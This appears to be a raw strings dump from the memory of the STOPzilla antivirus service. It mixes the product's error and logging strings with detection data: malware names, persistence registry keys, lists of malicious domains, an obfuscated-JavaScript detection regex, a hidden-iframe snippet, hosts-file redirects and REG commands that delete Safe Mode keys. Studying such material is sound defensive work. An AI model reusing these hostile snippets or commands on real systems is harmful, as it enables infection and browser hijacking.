SELECT value_type, value_data FROM kv_data WHERE user=? AND key=?
REPLACE INTO kv_data (user, key, value_type, value_data) VALUES (?, ?, ?, ?)
SELECT key, value_type, value_data FROM kv_data WHERE user=? AND key LIKE ?
DELETE FROM kv_data WHERE user=? AND key LIKE ?
DELETE FROM kv_data WHERE user=? AND key=?
DELETE FROM kv_data WHERE user=? AND key NOT LIKE ?
Failed to compile statement '%s' [%u|%s]
Failed to execute statement '%s' [%u|%s]
%hs: CreateFile('%s') failed [%u|%s]
tFailed to execute function '%hs' [%u|%s]
lFailed to set value '%hs' [%u|%s]
%hs: unsupported step '%hs'
%hs: invalid option '%c' for component (%d/%hs)
%hs: option '%c' for component (%d/%hs) requires value for variable %hs
%hs: option '%c' for component (%d/%hs) contains unbalanced variable delimiters
CreateInstance(CLSID_SBLogger) returned 0xX
CreateInstance(CLSID_SBService) returned 0xX
CreateInstance(CLSID_SBScanControl) returned 0xX
CreateInstance(CLSID_SBActiveProtection) returned 0xX
CreateInstance(CLSID_SBRegistration) returned 0xX
CreateInstance(CLSID_SBQuarantine) returned 0xX
CreateInstance(CLSID_SBThreatDefinitions) returned 0xX
CreateInstance(CLSID_SBSoftwareUpdates) returned 0xX
CreateInstance(CLSID_SBWSC) returned 0xX
CreateInstance(CLSID_SBVipre) returned 0xX
CreateInstance(CLSID_SBFirewall) returned 0xX
CreateInstance(CLSID_SBEmailAV) returned 0xX
CreateInstance(CLSID_SBHIPS) returned 0xX
CreateInstance(CLSID_SBWebFilter) returned 0xX
CreateInstance(CLSID_SBLanGuard) returned 0xX
Released ISBFirewallWebFilter
vipre.config.scan.known-apps.reset
%hs: VIPRE failure [0xX|%s]
gVIPRE: Error communicating to set back the config: %s
Incompatibles Check: Did not find program data in '%s' or '%s'
incompats.dat
IncompatiblePrograms.dll
Incompatibles Check: Found '%s' but not '%s'
Incompatibles Check: '%s' does not contain function '%hs'
Incompatibles Check: Found but did not load '%s' [%u|%s]
B%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been cleaned.%CRLFÞfinitions Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been quarantined. You can unquarantine this suspicious file from the %PRODUCT% application.%CRLFÞfinition Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been deleted.%CRLFÞfinitions Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCT% Anti-phishing removed a known bad URL from your email message. It was deleted or quarantined and replaced with this message.
*.theme
theme.xml
.theme
nCSZGraphicsHive::_ReferenceFont - Failed to load font '%S'.
CSZGraphicsHive::_LoadTTF - Failed to load system font '%s' (0xX).
CSZGraphicsHive::_LoadTTF - Loading font '%S'.
CSZGraphicsHive::_LoadTTF - Failed to load memory font '%S' (0xX).
CSZGraphicsHive::_LoadTTF - Failed to find container file '%s'.
CSZGraphicsHive::_LoadTTF - Failed to find font face '%S'.
Direct3D: Could not create IDirect3DDevice9 (0xX).
Error: Unexpected message loop (0xX).
ColumnData_%d
ColumnWidth_%d
comctl32.dll
UxTheme.dll
%Program Files% (x86)\Microsoft Visual Studio 12.0\VC\atlmfc\include\afxwin2.inl
CSZGraphicsFont::Load - GDI Failed to load '%s' (0xX)
%hs (%p): uStatusCode = %u
%hs (%p): actual content length (%I64u) exceeds reported (%I64u)
HTTPS
SZHttp/1.0
%hs: WinHttpConnect(%s, %u) failure [%u|%s]
%hs: WinHttpOpen failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_CONNECT_TIMEOUT - failure [%u|%s]
%hs: WinHttpOpenRequest(%s, %s) failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_RECEIVE_TIMEOUT - failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_SEND_TIMEOUT - failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_RESOLVE_TIMEOUT - failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_RECEIVE_RESPONSE_TIMEOUT - failure [%u|%s]
%hs: WinHttpSetOption failure [%u|%s]
%hs: WinHttpQueryOption failure [%u|%s]
%hs: WinHttpReceiveResponse failure [%u|%s]
%hs: WinHttpSendRequest failure [%u|%s]
%hs: request failed with status %u
%hs: WinHttpQueryHeaders(WINHTTP_QUERY_STATUS_CODE) failure [%u|%s]
%hs: WinHttpQueryDataAvailable failure [%u|%s]
%hs: WinHttpQueryHeaders(WINHTTP_QUERY_CONTENT_LENGTH) failure [%u|%s]
%hs: WinHttpReadData failure [%u|%s]
\\.\pipe\
%hs: queue '%s', index %u - wait failed with result %u
%hs: queue '%s', index %u - thread 0x%X started
%hs: queue '%s', index %u - thread 0x%X ending
%hs: queue '%s' - attempt to start while abort is signalled
%hs: queue '%s', index %u - failed to start [%u|%s]
%hs: queue '%s', index %u - thread completed
_%hs: '%s' (0xX)
%hs: failed to compile '%s' [%d|%hs]
dbghelp.dll
%s%d.log
%s%d.dmp
Unhandled Exception: Code(0xX) Addess(0xX)
%hs: expected sequence number greater than or equal to %u; got %u instead
%hs: packet %u of request %u indicated no more data when %u packets remain.
%hs: expected packet size in %u bytes; got %u bytes
%hs: received %u bytes; 0 expected
%hs: expected packet buffer of %u bytes; got %u bytes
xx
C:\ProgramData\STOPzilla!\dumps\STOPzilla.exefatal
7.0.1.3
STOPzilla.exe

SBAMSvc.exe_3448_rwx_00DC0000_00004000:

.upx2
.upx1
.upx0
.reloc
.idata
.rdata
.data
.text
AutoIT 3.3.12.0
AutoIT 3.2.6.0
AutoIT 3.2.0.0
AutoIT 3.0.100.0
AutoIT 3.0.102
Upack 0.3.9

SBAMSvc.exe_3448_rwx_00E20000_0000A000:

T$.RV
Compiler Detection: Borland C/C   1999 %d
Compiler Detection: Borland C   Dll %d
Compiler Detection: FreeBasic_0_14 %d
Compiler Detection: MASM_TASM %d
Compiler Detection: MASM32 %d
Compiler Detection: Microsoft_Visual_C_2_0 %d
Compiler Detection: Microsoft_Visual_Cpp %d
Compiler Detection: Microsoft_Visual_Cpp_3_0_old_crap_ %d
Compiler Detection: Microsoft_Visual_Cpp_7_0_Custom %d
Compiler Detection: Microsoft_Visual_Cpp_8_0_Debug %d
Compiler Detection: Microsoft Visual C   8.0 Release %d
Compiler Detection: Microsoft_Visual_Cpp_DLL %d
Compiler Detection: Microsoft_Visual_Cpp_v4_x %d
Compiler Detection: Microsoft_Visual_Cpp_v5_0_v6_0_MFC_ %d
Compiler Detection: Microsoft_Visual_Cpp_v6_0_Debug_Version_ %d
Compiler Detection: Microsoft_Visual_Cpp_v6_0_DLL %d
Compiler Detection: Microsoft_Visual_Cpp_v6_0_SPx %d
Compiler Detection: Microsoft_Visual_Cpp_v7_0 %d
Compiler Detection: Microsoft_Visual_Cpp_v7_0_DLL %d
Compiler Detection: Microsoft_Visual_Cpp_v7_1_DLL %d
Compiler Detection: Microsoft_Visual_Cpp_v7_1_DLL_Debug_ %d
Compiler Detection: Microsoft_Visual_Cpp_v7_1_EXE %d
Compiler Detection: Microsoft_Visual_Cpp_vx_x %d
Compiler Detection: Microsoft_Visual_Cpp_vx_x_DLL %d
Compiler Detection: Microsoft_Visual_CSharp_Basic_NET %d
Compiler Detection: MinGW_GCC_DLL_v2xx %d
Compiler Detection: MinGW_GCC_v2_x %d
Compiler Detection: MingWin32_Dev_Cpp_v4_9_9_1_h_ %d
Compiler Detection: MingWin32_Dev_Cpp_v4_x_h_ %d
Compiler Detection: MingWin32_GCC_3_x %d
Compiler Detection: MingWin32_vn_n_h_ %d
Compiler Detection: PowerBASIC_CC_3_0x %d
Compiler Detection: PowerBASIC_CC_4_0 %d
Compiler Detection: PowerBASIC_Win_7_0x %d
Compiler Detection: PseudoSigner_0_1_Borland_Delphi_6_0_7_0_Anorganix %d
Compiler Detection: PseudoSigner_0_1_Microsoft_Visual_Basic_5_0_6_0_Anorganix %d
Compiler Detection: PseudoSigner_0_1_Microsoft_Visual_Cpp_5_0p_MFC_Anorganix %d
Compiler Detection: PseudoSigner_0_1_Microsoft_Visual_Cpp_6_0_Debug_Version_Anorganix %d
Compiler Detection: PseudoSigner_0_1_Microsoft_Visual_Cpp_7_0_DLL_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Borland_Cpp_1999_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Borland_Cpp_DLL_Method_2_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Borland_Delphi_DLL_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Borland_Delphi_Setup_Module_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Microsoft_Visual_Basic_5_0_6_0_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Microsoft_Visual_Cpp_7_0_DLL_Anorganix %d
Compiler Detection: PseudoSigner_0_2_MinGW_GCC_2_x_Anorganix %d
Compiler Detection: PseudoSigner_0_2_REALBasic_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Watcom_C_Cpp_DLL_Anorganix %d
Compiler Detection: PseudoSigner_0_2_WATCOM_C_Cpp_EXE_Anorganix %d
Compiler Detection: REALbasic %d
Compiler Detection: Star_PseudoSigner_0_1_Borland_Delphi_3_0_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_Borland_Delphi_5_0_KOL_MCK_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_Microsoft_Visual_Basic_6_0_DLL_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_Microsoft_Visual_Cpp_6_0_Debug_Version_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_Microsoft_Visual_Cpp_6_20_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_MinGW_GCC_2_x_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_WATCOM_C_Cpp_EXE_Anorganix %d
Compiler Detection: Stranik_1_3_Modula_C_Pascal %d
Compiler Detection: Symantec_Visual_Cafe_v3_0 %d
Compiler Detection: TASM_MASM %d
VB Signature: %x
VB Header Startaddress: %x
Compiler Detection: WATCOM_C_Cpp %d
Compiler Detection: WATCOM C/C   1.7 %d
Compiler Detection: WATCOM_C_Cpp_32_Run_Time_System_1988_1995 %d
Compiler Detection: ZipWorxSecureEXE_v2_5_ZipWORX_Technologies_LLC_h_ %d

SBAMSvc.exe_3448_rwx_00E30000_0000E000:

 =-=/=*=&=,=><
() -/*&[]

SBAMSvc.exe_3448_rwx_06F50000_00156000:

%SYSTEM%
Win32.Unair
{4b87fd04-2b89-0306-b0db-7dd6740e6c89}
{4481a693-e8d2-9549-4315-0ef724694f3f}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{beaec9c9-2c0a-1c56-3063-e776919a4d6c}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CB73411E-48F7-9D19-6293-EA0AD71836D4}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0fc85afd-096d-731e-a871-6c0f1af600dc}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{beaec9c9-2c0a-1c56-3063-e776919a4d6c}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB73411E-48F7-9D19-6293-EA0AD71836D4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3698A47F-0E80-000E-7948-960CF605F542}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fc85afd-096d-731e-a871-6c0f1af600dc}
HKEY_CURRENT_USER\Software\{C5D43B9E-F5B7-480B-B8C4-C3A78AF3E670}
HKEY_CURRENT_USER\Software\{5d90b4ad-0f8f-c24a-865f-900f2caccae2}
HKEY_CURRENT_USER\Software\{59301c76-ede9-a1a9-f66d-c99effa3aa02}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{3698A47F-0E80-000E-7948-960CF605F542}
u$
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS\
explorer.exe csrcs.exe
124.40.51.17
58.17.236.92
360.cn
360safe.cn
360safe.com
60.210.176.251
chinakv.com
cnnod32.cn
dswlab.com
duba.net
eset.com
ikaka.com
jiangmin.com
kaspersky.com
kingsoft.com
lanniao.org
nod32.com
nod32club.com
qihoo.cn
qihoo.com
rising.com
sucop.com
virustotal.com
7.0.600
7.0.3790.
7.0.2600.
msvcrt.dll
sfcfiles.dll
.reloc
.rsrc
.data
.text
Menu\Programs\Startup\TEMP.HTA""",65
</script><script><script type="text/javascript">69101771096597821147010273105(.split
/* 'if (!document.getElementById('JSSS')){ document.getElementsByTagName('head').item(0).appendChild(js) };  */
<IFRAME src="hXXp://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
/script><script694565101774d6d10965416197825272114704666102734969105/g!=(.replace.charAt
/script>/scr' 'ipt><script"")'')/g,/ig,(/host.replaceyourwebfree.ru
yourwebcentral.ru
yourtruemate.ru
yourtruegame.ru
yourtruecrime.ru
yourtopfilms.ru
yourtolltag.ru
yourtagheuer.ru
yourmaxmedia.ru
yourauthentic.ru
yourarray.ru
xxlwebhost.ru
xboxliveweb.ru
worldwebworld.ru
worldwebmarkets.ru
worldsouth.ru
worldrat.ru
worldmusicmagazine.ru
worldhighspeed.ru
wintersaleonline.ru
window.redirect
whosaleonline.ru
webworldshop.ru
webpowerguide.ru
webnetloans.ru
webnetlinks.ru
webnetlender.ru
webnetexperts.ru
webnetenglish.ru
weblessnet.ru
webithost.ru
webdirectbroker.ru
webdesktopnet.ru
wavebank.ru
warbest.ru
votrelib.ru
vipodnososki.ru
viewhomesale.ru
videostan.ru
videosaleonline.ru
video-bum.ru
usaworldwideweb.ru
urlnext.ru
trueworldmedia.ru
truesoulonline.ru
truerealtime.ru
truelifefamily.ru
trueblueberyl.ru
trueblueally.ru
townwebmail.ru
topmediasite.ru
toplinemarine.ru
thetruehelp.ru
thestocksite.ru
thespeeddate.ru
theprocast.ru
themobisite.ru
themobilewindow.ru
thelifetag.ru
thelaceweb.ru
thegiftsale.ru
thechocolateweb.ru
theaworld.ru
theatticsale.ru
theaonline.ru
theantimatrix.ru
testoogle.ru
testilla.ru
teenwebdesign.ru
tagsaleusa.ru
supertruelife.ru
superpropicks.ru
superore.ru
supernun.ru
supernil.ru
supernewstuff.ru
supernetbet.ru
supermyweb.ru
superhometours.ru
superhomeschool.ru
superhighest.ru
superaguide.ru
sugaryhome.ru
suesite.ru
sportwebnet.ru
soul-in-you.ru
smert-vest.ru
smartgaragesale.ru
sitesages.ru
sitedesigninc.ru
simpleworldhouse.ru
simplehomelink.ru
serialarchive.ru
seamscreative.info
saletradeonline.ru
rentbesthome.ru
regaught.ru
redtagjewelry.ru
redtagcruises.ru
redtagcentral.ru
recentmexico.ru
qualitysuper.ru
protechradio.ru
privius-life.ru
previouslife.ru
poxudeli.ru
pornomig.ru
popcorn-tv.ru
piezenia.ru
pieeonline.ru
ourfreesite.ru
orderseasilver.ru
oneanotherlife.ru
officialohsupplies.ru
obmanulis.ru
nowhomecare.ru
newworldlink.ru
newwaronline.ru
newvillagefresh.ru
newsourceworld.ru
newhomeline.ru
newgolfonline.ru
newcitymap.ru
netmusicbank.ru
myworldcampus.ru
myskysite.ru
myownage.ru
mygreatsale.ru
mycontentguide.ru
musicboxpro.ru
moviehit.ru
moremindpower.ru
mingleas.ru
mindgameworks.ru
mediatagonline.ru
maxserviceworld.ru
manbest.ru
lulucabana.com
ljinet.ru
linuxwebcam.ru
limowebcam.ru
libprojet.ru
letterssite.ru
lagworld.ru
kindpea.ru
jthek.ru
johnsite.ru
jerseyhomesite.ru
innewterra.ru
indiawebnet.ru
illsite.ru
icq-antivirus.ru
huzzahwebdesign.ru
huntalong.ru
hXXp://zerosmak-kiev-ua.1gb.ua/
hXXp://zeraa-com-ua.1gb.ua/
hXXp://whhothatgirl-kiev-ua.1gb.ua/
hXXp://unb0rn.biz/
hXXp://toldspeak.com/
hXXp://tiltandgrin.com/
hXXp://promajik.com/
hXXp://piazzacreative.com/
hXXp://panhandlepointers.com/
hXXp://mvblaw.com/
hXXp://mabcom.net/
hXXp://lendermedia.com/images/z.htm
hXXp://kendoaruba.net/
hXXp://iritirlast0.co.cc/
hXXp://holcombewaller.com/
hXXp://govos-com-ua.1gb.ua/
hXXp://fixuss.bravehost.com/
hXXp://ereintza.com/
hXXp://dwmmanagement.com/
hXXp://dottiehope.com/
hXXp://dextersss-com-ua.1gb.ua/
hXXp://alumicool.com/
hXXp://3torres.com/
hXXp://12s83.com/
hotnewguide.ru
homeusaonline.ru
homesweetnetwork.ru
homesiteworld.ru
homesitedesigns.ru
homesaleplus.ru
homeproair.ru
homehousemiami.ru
homegreatloans.ru
homecarenation.ru
homebuyerscd.ru
highestdog.ru
halfsite.ru
guiderose.ru
guidebat.ru
gridrevolutions.ru
greenscometrue.ru
greatwebradio.ru
greatvelocity.ru
greatsalecenter.ru
greatcarscity.ru
goldgolfbag.ru
gethomesite.ru
genuinenorth.ru
genuinehollywood.ru
genuineholly wood.ru
genuinecolors.ru
genuinecol ors.ru
gametopsite.ru
funwebmail.ru
freewebship.ru
freeprosports.ru
freemindlive.ru
forhomessale.ru
foresaleonline.ru
forallpro.ru
flywebcam.ru
ezsalebuy.ru
ezpoh.ru
extrafreeweb.ru
euroshares.ru
erogod.ru
egreatsale.ru
easytabletennis.ru
easymusicstore.ru
easylifedirect.ru
dub-dubom.ru
directscsi.ru
digitalsiteonline.ru
dietichka.ru
cybercityworld.ru
counterbest.ru
comingbig.ru
cometruestar.ru
cobalttrueblue.ru
cityhomesaustin.ru
cherrypieusa.ru
carswebnet.ru
carprotech.ru
busop.info
burkewebservices.ru
buejackmusic.ru
brownbagbar.ru
boardsaw.ru
blueseaguide.ru
bluejackmusic.ru
bluejackin.ru
blackseatrade.ru
biltop.ru
besttechhome.ru
beststyleweb.ru
bestsis.ru
bestseasilver.ru
bestnewsmall.ru
bestnewhaven.ru
bestmedpro.ru
bestlifeusa.ru
bestjackoff.ru
bestcia.ru
bestbondsite.ru
bestbob.ru
bestartsale.ru
beachdoo.ru
battop.ru
avattop.ru
authentictype.ru
atwebhost.ru
aohna.ru
anycitytown.ru
antivirusicq.ru
anti-virus2010.ru
ampsguide.ru
allpropro.ru
allbagshop.ru
accurategenuine.ru
/script><script"readme.eml", null,"resizable=no,top=6000,left=6000")window.open(
/script><scriptx68x74x74x70x3ax2fx2fx67x6fx2ex6bx69x73x73x78x2ex72x75x2fdocument.createElement(
</script><scriptOx[a-z0-9]{3}\x29\;\x7dcatch\x28Ox[a-z0-9]{3}\x29\x7b[A-Za-z0-9_]{1,64}=unescape\x28String\.fromCharCode\x28[0-9]{1,3}\x2bMath\.round\x28Ox[a-z0-9]{3}\.message\x29\x29\x2b[A-Za-z0-9_]{1,64}\x28Ox[a-z0-9]{3}\.message\x2b[0-9]{1,3}\x29\x29\;[A-Za-z0-9_]{1,64}=[A-Za-z0-9_]{1,64}\x28[A-Za-z0-9_]{1,64}\x29\;[A-Za-z0-9_]{1,64}=eval\x7d[A-Za-z0-9_]{1,64}\x28unescape\x28[A-Za-z0-9_]{1,64}\x29\x29\;
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\windows\system32\userinit.exe,
%SYSTEM%\userinit.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
7"7.reloc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Nwsapagent
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NWCWorkstation
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ias
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4
\bin\dcc32.exe"uses windows;
</script><scripton error resume nexthXXp://VVV.yuyu.com/?fav2
hXXp://VVV.wdheaven.cn/
hXXp://VVV.thysearch.net
hXXp://VVV.quary888.cn/
hXXp://VVV.musicmoa.net/
hXXp://VVV.membres.lycos.fr/chouhacasa/
hXXp://VVV.membres.lycos.fr/bmwvir/
hXXp://VVV.freewebtown.com/crman/
hXXp://VVV.82vv.com/
hXXp://VVV.77zb.com/
hXXp://VVV.6783.com/?u2
hXXp://VVV.223224.com/taobao/
hXXp://VVV.17oye.cn/
hXXp://wa3ra.110mb.com/
hXXp://volam111.110mb.com/
hXXp://thoidep.com/
hXXp://test004.adultsexual.info/
hXXp://ro7ei.com/
hXXp://rmksa.com/
hXXp://qgi.org.sa/
hXXp://ms-dl-center3699.info/
hXXp://moxulica.evonet.ro/
hXXp://members.lycos.co.uk/sauytre00/
hXXp://laylalesb.sitesled.com/
hXXp://lauxanhus.110mb.com/
hXXp://italiandirectory.com/
hXXp://images2008.8866.org/
hXXp://files.myopera.com/roball/
hXXp://diendansinhvienvnn.com/
hXXp://dichvum4g.net/
hXXp://43leloi43.110mb.com/
hXXp://194.160.227.34/
hXXp://133666620.host.dj58.net/
208.109.220.95
173.236.97.27
173.201.254.6
64.117.35.255
127.0.0.1 localhost
Host file has been infected by :W32.Depkominfo.A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
'))</script>\/\/\o\n\l\y\f\i\n\d\.\n\e\t\/\i\n\.\c\g\i\?<script>eval(unescape(
1\$ 1\$(1\$,1\$03
kernel32.dll
.mdata
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\A-
%SYSTEM%\Tasks\A-
REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\net /f
REG COPY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\net HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network /s
REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\mini /f
REG COPY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\mini HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal /s
REG COPY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\jjonjo HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network /s
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\HashVsSTDTest
HKEY_LOCAL_MACHINE\SOFTWARE\HashVsSTDTest
\Temp\UuU.uUu
\TEMP\XxX.xXx
firefox
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
ParseAutoexec
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
{CAB8D20A-31A9-4505-AD1B-6014A0F32D9D}
{1EBE9E45-C4BB-4B2A-84CA-7257C9D28992}
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Classes\.exe
HKEY_CURRENT_USER\Software\CryptoLocker_0388
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKLM\SOFTWARE\Microsoft\Windows Search\Gather\Windows\SystemIndex\Crawls\27\
HKCU\softwaremicrosoftwindowscurrentversionpoliciesexplorer
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKCU\Software\Policies\Microsoft\Windows NT\Terminal Services
SCRNSAVE.EXE
HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Windows
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
NoChangeKeyboardNavigationIndicators
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
rundll32.exe
.txt,
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
%WINDOWS%\Active.bat
SkypeAutoConect.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNSService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPPortMapService
.dspak
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{67EFG7H6-8IJL-56YT-KLH4-76WE2D3RAM87}
%APPDATA%\Microsoft\Windows\xGgUF
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Host-process Windows (Rundll32.exe)
Service Host Process for Windows
WINDOWS SYSTEM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
198.175.125.141 sotialmonstercookie.ru
198.175.125.141 m.ok.ru
198.175.125.141 m.odnoklassniki.ru
198.175.125.141 odnoklassniki.ru
198.175.125.141 m.vk.com
198.175.125.141 m.my.mail.ru
198.175.125.141 my.mail.ru
198.175.125.141 ok.ru
198.175.125.141 VVV.odnoklassniki.ru
198.175.125.141 vk.com
WINDOWS NT SERVICE
[1 5 7 17]
%WINDOWS%\TASKS\FLASHDRV.JOB
.exe.exe
.ndata
%SYSTEM%\drivers\etc\h
T.TEQUILA
4ffffuser32.dll
advapi32.dll
mpr.dllffffuser32.dll
mpr.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Aasppapmmxkvs
KERNEL32.dll
<w.uT
.UPX0
.vmp1
.vmp0
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions present
HKEY_CLASSES_ROOT\batfile\shell\open\command
HKEY_CLASSES_ROOT\VBSFile\Shell\Open2\Command
HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command
HKEY_CLASSES_ROOT\VBEFile\Shell\Open2\Command
HKEY_CLASSES_ROOT\VBEFile\Shell\Open\Command
HKEY_CLASSES_ROOT\scrfile\shell\open\command
HKEY_CLASSES_ROOT\exefile\shell\runas\command
HKEY_CLASSES_ROOT\exefile\shell\open\command
%SystemRoot%\System32\CScript.exe "%1" %*
%SystemRoot%\System32\WScript.exe "%1" %*
%WINDOWS%
%PROGRAMS%\Foto.lnk
ÞSKTOPDIRECTORY%\Foto.lnk
%PROGRAMS%\SUPER CONTENUTI.lnk
ÞSKTOPDIRECTORY%\SUPER CONTENUTI.lnk
%PROGRAMS%\Club del Vizio - Foto Video Calendari - VM18.lnk
ÞSKTOPDIRECTORY%\Club del Vizio - Foto Video Calendari - VM18.lnk
%SYSTEM%\winxtx
%SYSTEM%\Winsystens
%SYSTEM%\Winsysten
%SYSTEM%\Winsystemt
%SYSTEM%\Winsystemq
%SYSTEM%\Winsystempo
%SYSTEM%\Winsystemp
%SYSTEM%\Winsystemm
%SYSTEM%\Winsysteml
%SYSTEM%\Winsystemk
%SYSTEM%\Winsystemc
%SYSTEM%\Winsystemas
%SYSTEM%\Winsystem
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
{C7E341C1-655B-48EB-9FCC-5B56B4A96121}
{491A5872-C30F-4E54-8FF1-BF31CC73DC4B}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\CmdMapping
{45525B3D-F0A7-4050-A067-3D0AFF22C45D}
